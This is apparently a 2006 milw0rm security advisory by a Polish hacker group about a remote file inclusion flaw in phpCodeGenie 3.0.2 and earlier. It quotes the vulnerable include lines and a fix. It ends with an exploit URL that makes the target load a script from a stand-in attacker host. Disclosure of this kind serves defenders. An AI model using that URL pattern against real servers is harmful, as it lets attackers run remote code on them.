72 lines
No EOL
1.9 KiB
Text
72 lines
No EOL
1.9 KiB
Text
/*
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- [Script name: phpCodeGenie v. 3.0.2
|
|
- [Script site: http://sourceforge.net/projects/phpcodegenie/
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Find by: Kacper (a.k.a Rahim)
|
|
+
|
|
- Contact: kacper1964@yahoo.pl
|
|
- or
|
|
- http://www.devilteam.yum.pl/
|
|
- and
|
|
- http://www.rahim.webd.pl/
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Special Greetz: DragonHeart ;-)
|
|
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
|
|
-
|
|
!@ Przyjazni nie da sie zamienic na marne korzysci @!
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Z Dedykacja dla osoby,
|
|
- bez ktorej nie mogl bym zyc...
|
|
- K.C:* J.M (a.k.a Magaja)
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
*/
|
|
/*
|
|
+++++++++++++++++++++START+++++++++++++++++++++++
|
|
vulnerable code => app/common/lib/codeBeautifier/Beautifier/Core.php
|
|
line 20-25:
|
|
....
|
|
|
|
include_once($BEAUT_PATH."/Beautifier/HFile.php");
|
|
include_once($BEAUT_PATH."/Beautifier/Context.php");
|
|
|
|
class Core
|
|
{
|
|
....
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++
|
|
*/
|
|
/*
|
|
+++++++++++++++++++++FIX+++++++++++++++++++++++++
|
|
app/common/lib/codeBeautifier/Beautifier/Core.php line 20-25:
|
|
....
|
|
$BEAUT_PATH = LIB_COMPONENT.FILE_SEPARATOR."codeBeautifier";
|
|
include_once($BEAUT_PATH."/Beautifier/HFile.php");
|
|
include_once($BEAUT_PATH."/Beautifier/Context.php");
|
|
|
|
class Core
|
|
{
|
|
....
|
|
++++++++++++++++++++THE+END++++++++++++++++++++++
|
|
*/
|
|
#Exploit:
|
|
|
|
http://www.site.com/[phpCodeGenie_path]/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=[http://www.myevilsite.com/evil_scripts.txt]
|
|
|
|
|
|
# milw0rm.com [2006-08-18] |